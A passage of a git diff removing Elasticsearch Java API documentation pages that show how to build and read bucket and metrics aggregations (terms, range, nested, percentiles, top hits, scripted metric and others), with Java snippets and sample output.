--------------------------------------------------- -key 
[*-192.168.1.0], from [null], to [192.168.1.0], doc_count [13] -key [192.168.1.0-192.168.2.0], from [192.168.1.0], to [192.168.2.0], doc_count [14] -key [192.168.2.0-*], from [192.168.2.0], to [null], doc_count [23] --------------------------------------------------- - -And for the second one (using Ip masks): - -[source,text] --------------------------------------------------- -key [192.168.0.0/32], from [192.168.0.0], to [192.168.0.1], doc_count [0] -key [192.168.0.0/24], from [192.168.0.0], to [192.168.1.0], doc_count [13] -key [192.168.0.0/16], from [192.168.0.0], to [192.169.0.0], doc_count [50] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc b/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc deleted file mode 100644 index 31d21604dc5..00000000000 --- a/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-missing]] -==== Missing Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-missing-aggregation.html[Missing Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders.missing("agg").field("gender"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.missing.Missing; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Missing agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc b/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc deleted file mode 100644 index b1ebad7a63b..00000000000 --- a/docs/java-api/aggregations/bucket/nested-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-nested]] -==== Nested Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-nested-aggregation.html[Nested Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .nested("agg", "resellers"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.nested.Nested; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Nested agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/range-aggregation.asciidoc b/docs/java-api/aggregations/bucket/range-aggregation.asciidoc deleted file mode 100644 index b30c856ebea..00000000000 --- a/docs/java-api/aggregations/bucket/range-aggregation.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[java-aggs-bucket-range]] -==== Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-range-aggregation.html[Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .range("agg") - .field("height") - .addUnboundedTo(1.0f) // from -infinity to 1.0 (excluded) - .addRange(1.0f, 1.5f) // from 1.0 to 1.5 (excluded) - .addUnboundedFrom(1.5f); // from 1.5 to +infinity --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Range as key - Number from = (Number) entry.getFrom(); // Bucket from - Number to = (Number) entry.getTo(); // Bucket to - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, from, to, docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [*-1.0], from [-Infinity], to [1.0], doc_count [9] -key [1.0-1.5], from [1.0], to [1.5], doc_count [21] -key [1.5-*], from [1.5], to [Infinity], doc_count [20] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc b/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc deleted file mode 100644 index 635b0e8cf77..00000000000 --- a/docs/java-api/aggregations/bucket/reverse-nested-aggregation.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ -[[java-aggs-bucket-reverse-nested]] -==== Reverse Nested Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-reverse-nested-aggregation.html[Reverse Nested Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .nested("agg", "resellers") - .subAggregation( - AggregationBuilders - .terms("name").field("resellers.name") - .subAggregation( - AggregationBuilders - .reverseNested("reseller_to_product") - ) - ); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.nested.Nested; -import org.elasticsearch.search.aggregations.bucket.nested.ReverseNested; -import org.elasticsearch.search.aggregations.bucket.terms.Terms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Nested agg = sr.getAggregations().get("agg"); -Terms name = agg.getAggregations().get("name"); -for (Terms.Bucket bucket : name.getBuckets()) { - ReverseNested resellerToProduct = bucket.getAggregations().get("reseller_to_product"); - resellerToProduct.getDocCount(); // Doc count -} --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc b/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc deleted file mode 100644 index 4450c324c82..00000000000 --- a/docs/java-api/aggregations/bucket/significantterms-aggregation.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[[java-aggs-bucket-significantterms]] -==== Significant Terms Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-significantterms-aggregation.html[Significant Terms Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .significantTerms("significant_countries") - .field("address.country"); - -// Let say you search for men only -SearchResponse sr = client.prepareSearch() - .setQuery(QueryBuilders.termQuery("gender", "male")) - .addAggregation(aggregation) - .get(); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.significant.SignificantTerms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -SignificantTerms agg = sr.getAggregations().get("significant_countries"); - -// For each entry -for (SignificantTerms.Bucket entry : agg.getBuckets()) { - entry.getKey(); // Term - entry.getDocCount(); // Doc count -} --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc b/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc deleted file mode 100644 index db584fd4ced..00000000000 --- a/docs/java-api/aggregations/bucket/terms-aggregation.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[[java-aggs-bucket-terms]] -==== Terms Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-terms-aggregation.html[Terms Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.terms.Terms; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Terms genders = sr.getAggregations().get("genders"); - -// For each entry -for (Terms.Bucket entry : genders.getBuckets()) { - entry.getKey(); // Term - entry.getDocCount(); // Doc count -} --------------------------------------------------- - -===== Order - -Import bucket ordering strategy classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.BucketOrder; --------------------------------------------------- - -Ordering the buckets by their `doc_count` in an ascending manner: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.count(true)) --------------------------------------------------- - -Ordering the buckets alphabetically by their terms in an ascending manner: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.key(true)) --------------------------------------------------- - -Ordering the buckets by single value metrics sub-aggregation (identified by the aggregation name): - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.aggregation("avg_height", false)) - .subAggregation( - AggregationBuilders.avg("avg_height").field("height") - ) --------------------------------------------------- - -Ordering the buckets by multiple criteria: - -[source,java] --------------------------------------------------- -AggregationBuilders - .terms("genders") - .field("gender") - .order(BucketOrder.compound( // in order of priority: - BucketOrder.aggregation("avg_height", false), // sort by sub-aggregation first - BucketOrder.count(true))) // then bucket count as a tie-breaker - .subAggregation( - AggregationBuilders.avg("avg_height").field("height") - ) --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics.asciidoc b/docs/java-api/aggregations/metrics.asciidoc deleted file mode 100644 index c9afb4c39d4..00000000000 --- a/docs/java-api/aggregations/metrics.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[java-aggregations-metrics]] - -include::metrics/min-aggregation.asciidoc[] - -include::metrics/max-aggregation.asciidoc[] - -include::metrics/sum-aggregation.asciidoc[] - -include::metrics/avg-aggregation.asciidoc[] - -include::metrics/stats-aggregation.asciidoc[] - -include::metrics/extendedstats-aggregation.asciidoc[] - -include::metrics/valuecount-aggregation.asciidoc[] - -include::metrics/percentile-aggregation.asciidoc[] - -include::metrics/percentile-rank-aggregation.asciidoc[] - -include::metrics/cardinality-aggregation.asciidoc[] - -include::metrics/geobounds-aggregation.asciidoc[] - -include::metrics/tophits-aggregation.asciidoc[] - 
-include::metrics/scripted-metric-aggregation.asciidoc[] diff --git a/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc b/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc deleted file mode 100644 index 511cbabf5c8..00000000000 --- a/docs/java-api/aggregations/metrics/avg-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-avg]] -==== Avg Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-avg-aggregation.html[Avg Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AvgAggregationBuilder aggregation = - AggregationBuilders - .avg("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.avg.Avg; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Avg agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc b/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc deleted file mode 100644 index 8a854e553f4..00000000000 --- a/docs/java-api/aggregations/metrics/cardinality-aggregation.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[java-aggs-metrics-cardinality]] -==== Cardinality Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-cardinality-aggregation.html[Cardinality Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -CardinalityAggregationBuilder aggregation = - AggregationBuilders - .cardinality("agg") - .field("tags"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.cardinality.Cardinality; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Cardinality agg = sr.getAggregations().get("agg"); -long value = agg.getValue(); --------------------------------------------------- - - diff --git a/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc b/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc deleted file mode 100644 index 8f2f12ede68..00000000000 --- a/docs/java-api/aggregations/metrics/extendedstats-aggregation.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[java-aggs-metrics-extendedstats]] -==== Extended Stats Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-extendedstats-aggregation.html[Extended Stats Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ExtendedStatsAggregationBuilder aggregation = - AggregationBuilders - .extendedStats("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.stats.extended.ExtendedStats; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -ExtendedStats agg = sr.getAggregations().get("agg"); -double min = agg.getMin(); -double max = agg.getMax(); -double avg = agg.getAvg(); -double sum = agg.getSum(); -long count = agg.getCount(); -double stdDeviation = agg.getStdDeviation(); -double sumOfSquares = agg.getSumOfSquares(); -double variance = agg.getVariance(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc b/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc deleted file mode 100644 index 571a61f12e7..00000000000 --- a/docs/java-api/aggregations/metrics/geobounds-aggregation.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[java-aggs-metrics-geobounds]] -==== Geo Bounds Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-geobounds-aggregation.html[Geo Bounds Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -GeoBoundsAggregationBuilder aggregation = - GeoBoundsAggregationBuilder - .geoBounds("agg") - .field("address.location") - .wrapLongitude(true); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.geobounds.GeoBounds; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -GeoBounds agg = sr.getAggregations().get("agg"); -GeoPoint bottomRight = agg.bottomRight(); -GeoPoint topLeft = agg.topLeft(); -logger.info("bottomRight {}, topLeft {}", bottomRight, topLeft); --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -bottomRight [40.70500764381921, 13.952946866893775], topLeft [53.49603022435221, -4.190029308156676] --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics/max-aggregation.asciidoc b/docs/java-api/aggregations/metrics/max-aggregation.asciidoc deleted file mode 100644 index 9bd39369842..00000000000 --- a/docs/java-api/aggregations/metrics/max-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-max]] -==== Max Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-max-aggregation.html[Max Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -MaxAggregationBuilder aggregation = - AggregationBuilders - .max("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.max.Max; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Max agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/min-aggregation.asciidoc b/docs/java-api/aggregations/metrics/min-aggregation.asciidoc deleted file mode 100644 index 0205cae44d8..00000000000 --- a/docs/java-api/aggregations/metrics/min-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-min]] -==== Min Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-min-aggregation.html[Min Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -MinAggregationBuilder aggregation = - AggregationBuilders - .min("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.min.Min; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Min agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc b/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc deleted file mode 100644 index ad54fbf5a46..00000000000 --- a/docs/java-api/aggregations/metrics/percentile-aggregation.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[java-aggs-metrics-percentile]] -==== Percentile Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-percentile-aggregation.html[Percentile Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -PercentilesAggregationBuilder aggregation = - AggregationBuilders - .percentiles("agg") - .field("height"); --------------------------------------------------- - -You can provide your own percentiles instead of using defaults: - -[source,java] --------------------------------------------------- -PercentilesAggregationBuilder aggregation = - AggregationBuilders - .percentiles("agg") - .field("height") - .percentiles(1.0, 5.0, 10.0, 20.0, 30.0, 75.0, 95.0, 99.0); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentile; -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentiles; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Percentiles agg = sr.getAggregations().get("agg"); -// For each entry -for (Percentile entry : agg) { - double percent = entry.getPercent(); // Percent - double value = entry.getValue(); // Value - - logger.info("percent [{}], value [{}]", percent, value); -} --------------------------------------------------- - - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -percent [1.0], value [0.814338896154595] -percent [5.0], value [0.8761912455821302] -percent [25.0], value [1.173346540141847] -percent [50.0], value [1.5432023318692198] -percent [75.0], value [1.923915462033674] -percent [95.0], value [2.2273644908535335] -percent [99.0], value [2.284989339108279] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc b/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc deleted file mode 100644 index a846d59f820..00000000000 --- a/docs/java-api/aggregations/metrics/percentile-rank-aggregation.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[java-aggs-metrics-percentile-rank]] -==== Percentile Ranks Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-percentile-rank-aggregation.html[Percentile Ranks Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -PercentileRanksAggregationBuilder aggregation = - AggregationBuilders - .percentileRanks("agg") - .field("height") - .values(1.24, 1.91, 2.22); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.percentiles.Percentile; -import org.elasticsearch.search.aggregations.metrics.percentiles.PercentileRanks; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -PercentileRanks agg = sr.getAggregations().get("agg"); -// For each entry -for (Percentile entry : agg) { - double percent = entry.getPercent(); // Percent - double value = entry.getValue(); // Value - - logger.info("percent [{}], value [{}]", percent, value); -} --------------------------------------------------- - - -This will basically produce: - -[source,text] --------------------------------------------------- -percent [29.664353095090945], value [1.24] -percent [73.9335313461868], value [1.91] -percent [94.40095147327283], value [2.22] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc b/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc deleted file mode 100644 index 5b68fa7be45..00000000000 --- a/docs/java-api/aggregations/metrics/scripted-metric-aggregation.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[java-aggs-metrics-scripted-metric]] -==== Scripted Metric Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Scripted Metric Aggregation] -with Java API. - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? doc.height.value : -1.0 * doc.height.value)")); --------------------------------------------------- - -You can also specify a `combine` script which will be executed on each shard: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? doc.height.value : -1.0 * doc.height.value)")) - .combineScript(new Script("double heights_sum = 0.0; for (t in state.heights) { heights_sum += t } return heights_sum")); --------------------------------------------------- - -You can also specify a `reduce` script which will be executed on the node which gets the request: - -[source,java] --------------------------------------------------- -ScriptedMetricAggregationBuilder aggregation = AggregationBuilders - .scriptedMetric("agg") - .initScript(new Script("state.heights = []")) - .mapScript(new Script("state.heights.add(doc.gender.value == 'male' ? 
doc.height.value : -1.0 * doc.height.value)"))
-    .combineScript(new Script("double heights_sum = 0.0; for (t in state.heights) { heights_sum += t } return heights_sum"))
-    .reduceScript(new Script("double heights_sum = 0.0; for (a in states) { heights_sum += a } return heights_sum"));
---------------------------------------------------
-
-
-===== Use aggregation response
-
-Import Aggregation definition classes:
-
-[source,java]
---------------------------------------------------
-import org.elasticsearch.search.aggregations.metrics.scripted.ScriptedMetric;
---------------------------------------------------
-
-[source,java]
---------------------------------------------------
-// sr is here your SearchResponse object
-ScriptedMetric agg = sr.getAggregations().get("agg");
-Object scriptedResult = agg.aggregation();
-logger.info("scriptedResult [{}]", scriptedResult);
---------------------------------------------------
-
-Note that the result depends on the script you built.
-For the first example, this will produce something like:
-
-[source,text]
---------------------------------------------------
-scriptedResult object [ArrayList]
-scriptedResult [ {
-"heights" : [ 1.122218480146643, -1.8148918111233887, -1.7626731575142909, ... ]
-}, {
-"heights" : [ -0.8046067304119863, -2.0785486707864553, -1.9183567430207953, ... ]
-}, {
-"heights" : [ 2.092635728868694, 1.5697545960886536, 1.8826954461968808, ... ]
-}, {
-"heights" : [ -2.1863201099468403, 1.6328549117346856, -1.7078288405893842, ... ]
-}, {
-"heights" : [ 1.6043904836424177, -2.0736538674414025, 0.9898266674373053, ... ]
-} ]
---------------------------------------------------
-
-The second example will produce:
-
-[source,text]
---------------------------------------------------
-scriptedResult object [ArrayList]
-scriptedResult [-41.279615707402876,
-                -60.88007362339038,
-                38.823270659734256,
-                14.840192739445632,
-                11.300902755741326]
---------------------------------------------------
-
-The last example will produce:
-
-[source,text]
---------------------------------------------------
-scriptedResult object [Double]
-scriptedResult [2.171917696507009]
---------------------------------------------------
-
diff --git a/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc b/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc
deleted file mode 100644
index 260d9c01cb9..00000000000
--- a/docs/java-api/aggregations/metrics/stats-aggregation.asciidoc
+++ /dev/null
@@ -1,41 +0,0 @@
-[[java-aggs-metrics-stats]]
-==== Stats Aggregation
-
-Here is how you can use
-{ref}/search-aggregations-metrics-stats-aggregation.html[Stats Aggregation]
-with Java API.
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -StatsAggregationBuilder aggregation = - AggregationBuilders - .stats("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.stats.Stats; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Stats agg = sr.getAggregations().get("agg"); -double min = agg.getMin(); -double max = agg.getMax(); -double avg = agg.getAvg(); -double sum = agg.getSum(); -long count = agg.getCount(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc b/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc deleted file mode 100644 index 453616916d7..00000000000 --- a/docs/java-api/aggregations/metrics/sum-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-sum]] -==== Sum Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-sum-aggregation.html[Sum Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -SumAggregationBuilder aggregation = - AggregationBuilders - .sum("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.sum.Sum; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Sum agg = sr.getAggregations().get("agg"); -double value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc b/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc deleted file mode 100644 index 2473b4b89d7..00000000000 --- a/docs/java-api/aggregations/metrics/tophits-aggregation.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[java-aggs-metrics-tophits]] -==== Top Hits Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-top-hits-aggregation.html[Top Hits Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .terms("agg").field("gender") - .subAggregation( - AggregationBuilders.topHits("top") - ); --------------------------------------------------- - -You can use most of the options available for standard search such as `from`, `size`, `sort`, `highlight`, `explain`... 
- -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .terms("agg").field("gender") - .subAggregation( - AggregationBuilders.topHits("top") - .explain(true) - .size(1) - .from(10) - ); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.terms.Terms; -import org.elasticsearch.search.aggregations.metrics.tophits.TopHits; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Terms agg = sr.getAggregations().get("agg"); - -// For each entry -for (Terms.Bucket entry : agg.getBuckets()) { - String key = entry.getKey(); // bucket key - long docCount = entry.getDocCount(); // Doc count - logger.info("key [{}], doc_count [{}]", key, docCount); - - // We ask for top_hits for each bucket - TopHits topHits = entry.getAggregations().get("top"); - for (SearchHit hit : topHits.getHits().getHits()) { - logger.info(" -> id [{}], _source [{}]", hit.getId(), hit.getSourceAsString()); - } -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [male], doc_count [5107] - -> id [AUnzSZze9k7PKXtq04x2], _source [{"gender":"male",...}] - -> id [AUnzSZzj9k7PKXtq04x4], _source [{"gender":"male",...}] - -> id [AUnzSZzl9k7PKXtq04x5], _source [{"gender":"male",...}] -key [female], doc_count [4893] - -> id [AUnzSZzM9k7PKXtq04xy], _source [{"gender":"female",...}] - -> id [AUnzSZzp9k7PKXtq04x8], _source [{"gender":"female",...}] - -> id [AUnzSZ0W9k7PKXtq04yS], _source [{"gender":"female",...}] --------------------------------------------------- diff --git a/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc b/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc deleted file mode 100644 index b180d22af33..00000000000 --- a/docs/java-api/aggregations/metrics/valuecount-aggregation.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[java-aggs-metrics-valuecount]] -==== Value Count Aggregation - -Here is how you can use -{ref}/search-aggregations-metrics-valuecount-aggregation.html[Value Count Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -ValueCountAggregationBuilder aggregation = - AggregationBuilders - .count("agg") - .field("height"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.metrics.valuecount.ValueCount; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -ValueCount agg = sr.getAggregations().get("agg"); -long value = agg.getValue(); --------------------------------------------------- - diff --git a/docs/java-api/aggs.asciidoc b/docs/java-api/aggs.asciidoc deleted file mode 100644 index c2e09b4901e..00000000000 --- a/docs/java-api/aggs.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[java-aggs]] -== Aggregations - -Elasticsearch provides a full Java API to play with aggregations. See the -{ref}/search-aggregations.html[Aggregations guide]. - -Use the factory for aggregation builders (`AggregationBuilders`) and add each aggregation -you want to compute when querying and add it to your search request: - -[source,java] --------------------------------------------------- -SearchResponse sr = node.client().prepareSearch() - .setQuery( /* your query */ ) - .addAggregation( /* add an aggregation */ ) - .execute().actionGet(); --------------------------------------------------- - -Note that you can add more than one aggregation. See -{ref}/search-search.html[Search Java API] for details. - -To build aggregation requests, use `AggregationBuilders` helpers. Just import them -in your class: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.AggregationBuilders; --------------------------------------------------- - -=== Structuring aggregations - -As explained in the -{ref}/search-aggregations.html[Aggregations guide], you can define -sub aggregations inside an aggregation. - -An aggregation could be a metrics aggregation or a bucket aggregation. - -For example, here is a 3 levels aggregation composed of: - -* Terms aggregation (bucket) -* Date Histogram aggregation (bucket) -* Average aggregation (metric) - -[source,java] --------------------------------------------------- -SearchResponse sr = node.client().prepareSearch() - .addAggregation( - AggregationBuilders.terms("by_country").field("country") - 